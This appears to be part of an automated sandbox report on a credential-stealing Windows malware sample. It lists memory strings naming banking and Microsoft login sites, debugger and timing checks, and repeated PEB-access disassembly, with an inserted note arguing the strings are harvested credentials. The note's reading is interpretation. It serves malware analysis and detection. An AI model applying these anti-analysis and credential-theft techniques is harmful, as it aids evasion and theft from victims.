                Source: H846yjBj.23.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696492231t
                Source: H846yjBj.23.dr Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: soft.com/profileVMware20
                Source: H846yjBj.23.dr Binary or memory string: AMC password management pageVMware20,11696492231
                Source: H846yjBj.23.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: H846yjBj.23.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: saction PasswordVMware20
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ist test formVMware20,11696492231
                Source: H846yjBj.23.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: H846yjBj.23.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .co.inVMware20,11696492231d
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20l
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,116
                Source: H846yjBj.23.dr Binary or memory string: discord.comVMware20,11696492231f
                Source: H846yjBj.23.dr Binary or memory string: global block list test formVMware20,11696492231
                Source: ISaSZznjXcpoJ.exe, 00000018.00000002.2511279210.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                Source: H846yjBj.23.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: H846yjBj.23.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ivebrokers.co.inVMware20X
                Source: H846yjBj.23.dr Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: H846yjBj.23.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696492231}
                Source: H846yjBj.23.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: H846yjBj.23.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: systray.exe, 00000017.00000002.2508850216.0000000003522000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
                Source: H846yjBj.23.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: H846yjBj.23.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: H846yjBj.23.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rs - HKVMware20,11696492231]
                Source: H846yjBj.23.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: H846yjBj.23.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: H846yjBj.23.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,1169649223g
                Source: H846yjBj.23.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: H846yjBj.23.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nteractive Brokers - EU East & CentralVMware20,11696492231
                Source: H846yjBj.23.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: firefox.exe, 0000001A.00000002.1882377637.00000184B529C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: H846yjBj.23.dr Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: H846yjBj.23.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: H846yjBj.23.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: H846yjBj.23.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ivebrokers.comVMware20,1<
                Source: H846yjBj.23.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Note (editor's reading of the two string families above, not a report signature): "Hyper-V RAW%SystemRoot%\system32\mswsock.dll" is the Winsock catalog entry for the Hyper-V socket provider and is present in any process that has loaded Winsock, which is why it also turns up in the sandbox's own firefox.exe (process 0x1A). The "VMware20,11696492231" strings occur only in H846yjBj.23.dr, a file written by process 23 (systray.exe, the FormBook-injected process), and in that process's memory, each glued to a saved-login site name (outlook.office.com, bankofamerica.com, dev.azure.com); the most plausible reading is that they are the sandbox's browser credential store as harvested by the stealer. They corroborate the credential-theft signatures rather than a hypervisor check by the sample.
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_015D096E rdtsc 15_2_015D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00417853 LdrLoadDll, 15_2_00417853
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01596154 mov eax, dword ptr fs:[00000030h] 15_2_01596154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01596154 mov eax, dword ptr fs:[00000030h] 15_2_01596154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0158C156 mov eax, dword ptr fs:[00000030h] 15_2_0158C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01624144 mov eax, dword ptr fs:[00000030h] 15_2_01624144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01624144 mov eax, dword ptr fs:[00000030h] 15_2_01624144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01624144 mov ecx, dword ptr fs:[00000030h] 15_2_01624144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01624144 mov eax, dword ptr fs:[00000030h] 15_2_01624144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01624144 mov eax, dword ptr fs:[00000030h] 15_2_01624144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01628158 mov eax, dword ptr fs:[00000030h] 15_2_01628158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h] 15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163E10E mov ecx, dword ptr fs:[00000030h] 15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h] 15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h] 15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163E10E mov ecx, dword ptr fs:[00000030h] 15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h] 15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h] 15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163E10E mov ecx, dword ptr fs:[00000030h] 15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h] 15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163E10E mov ecx, dword ptr fs:[00000030h] 15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01650115 mov eax, dword ptr fs:[00000030h] 15_2_01650115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_015C0124 mov eax, dword ptr fs:[00000030h] 15_2_015C0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163A118 mov ecx, dword ptr fs:[00000030h] 15_2_0163A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163A118 mov eax, dword ptr fs:[00000030h] 15_2_0163A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163A118 mov eax, dword ptr fs:[00000030h] 15_2_0163A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0163A118 mov eax, dword ptr fs:[00000030h] 15_2_0163A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_016661E5 mov eax, dword ptr fs:[00000030h] 15_2_016661E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_015C01F8 mov eax, dword ptr fs:[00000030h] 15_2_015C01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_016561C3 mov eax, dword ptr fs:[00000030h] 15_2_016561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_016561C3 mov eax, dword ptr fs:[00000030h] 15_2_016561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 15_2_0160E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 15_2_0160E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0160E1D0 mov ecx, dword ptr fs:[00000030h] 15_2_0160E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 15_2_0160E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 15_2_0160E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0158A197 mov eax, dword ptr fs:[00000030h] 15_2_0158A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0158A197 mov eax, dword ptr fs:[00000030h] 15_2_0158A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0158A197 mov eax, dword ptr fs:[00000030h] 15_2_0158A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_015D0185 mov eax, dword ptr fs:[00000030h] 15_2_015D0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01634180 mov eax, dword ptr fs:[00000030h] 15_2_01634180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01634180 mov eax, dword ptr fs:[00000030h] 15_2_01634180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0164C188 mov eax, dword ptr fs:[00000030h] 15_2_0164C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0164C188 mov eax, dword ptr fs:[00000030h] 15_2_0164C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0161019F mov eax, dword ptr fs:[00000030h] 15_2_0161019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0161019F mov eax, dword ptr fs:[00000030h] 15_2_0161019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0161019F mov eax, dword ptr fs:[00000030h] 15_2_0161019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0161019F mov eax, dword ptr fs:[00000030h] 15_2_0161019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01592050 mov eax, dword ptr fs:[00000030h] 15_2_01592050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_015BC073 mov eax, dword ptr fs:[00000030h] 15_2_015BC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_01616050 mov eax, dword ptr fs:[00000030h] 15_2_01616050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE016 mov eax, dword ptr fs:[00000030h]15_2_015AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE016 mov eax, dword ptr fs:[00000030h]15_2_015AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE016 mov eax, dword ptr fs:[00000030h]15_2_015AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE016 mov eax, dword ptr fs:[00000030h]15_2_015AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01626030 mov eax, dword ptr fs:[00000030h]15_2_01626030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01614000 mov ecx, dword ptr fs:[00000030h]15_2_01614000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158A020 mov eax, dword ptr fs:[00000030h]15_2_0158A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158C020 mov eax, dword ptr fs:[00000030h]15_2_0158C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016160E0 mov eax, dword ptr fs:[00000030h]15_2_016160E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158C0F0 mov eax, dword ptr fs:[00000030h]15_2_0158C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D20F0 mov ecx, dword ptr fs:[00000030h]15_2_015D20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015980E9 mov eax, dword ptr fs:[00000030h]15_2_015980E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158A0E3 mov ecx, dword ptr fs:[00000030h]15_2_0158A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016120DE mov eax, dword ptr fs:[00000030h]15_2_016120DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016280A8 mov eax, dword ptr fs:[00000030h]15_2_016280A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159208A mov eax, dword ptr fs:[00000030h]15_2_0159208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016560B8 mov eax, dword ptr fs:[00000030h]15_2_016560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016560B8 mov ecx, dword ptr fs:[00000030h]15_2_016560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163437C mov eax, dword ptr fs:[00000030h]15_2_0163437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01638350 mov ecx, dword ptr fs:[00000030h]15_2_01638350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165A352 mov eax, dword ptr fs:[00000030h]15_2_0165A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov eax, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov eax, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov eax, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov ecx, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov eax, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161035C mov eax, dword ptr fs:[00000030h]15_2_0161035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158C310 mov ecx, dword ptr fs:[00000030h]15_2_0158C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B0310 mov ecx, dword ptr fs:[00000030h]15_2_015B0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA30B mov eax, dword ptr fs:[00000030h]15_2_015CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA30B mov eax, dword ptr fs:[00000030h]15_2_015CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA30B mov eax, dword ptr fs:[00000030h]15_2_015CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A3C0 mov eax, dword ptr fs:[00000030h]15_2_0159A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015983C0 mov eax, dword ptr fs:[00000030h]15_2_015983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015983C0 mov eax, dword ptr fs:[00000030h]15_2_015983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015983C0 mov eax, dword ptr fs:[00000030h]15_2_015983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015983C0 mov eax, dword ptr fs:[00000030h]15_2_015983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016163C0 mov eax, dword ptr fs:[00000030h]15_2_016163C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C63FF mov eax, dword ptr fs:[00000030h]15_2_015C63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0164C3CD mov eax, dword ptr fs:[00000030h]15_2_0164C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE3F0 mov eax, dword ptr fs:[00000030h]15_2_015AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE3F0 mov eax, dword ptr fs:[00000030h]15_2_015AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE3F0 mov eax, dword ptr fs:[00000030h]15_2_015AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A03E9 mov eax, dword ptr fs:[00000030h]15_2_015A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016343D4 mov eax, dword ptr fs:[00000030h]15_2_016343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016343D4 mov eax, dword ptr fs:[00000030h]15_2_016343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E3DB mov eax, dword ptr fs:[00000030h]15_2_0163E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E3DB mov eax, dword ptr fs:[00000030h]15_2_0163E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E3DB mov ecx, dword ptr fs:[00000030h]15_2_0163E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E3DB mov eax, dword ptr fs:[00000030h]15_2_0163E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01588397 mov eax, dword ptr fs:[00000030h]15_2_01588397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01588397 mov eax, dword ptr fs:[00000030h]15_2_01588397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01588397 mov eax, dword ptr fs:[00000030h]15_2_01588397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158E388 mov eax, dword ptr fs:[00000030h]15_2_0158E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158E388 mov eax, dword ptr fs:[00000030h]15_2_0158E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158E388 mov eax, dword ptr fs:[00000030h]15_2_0158E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B438F mov eax, dword ptr fs:[00000030h]15_2_015B438F
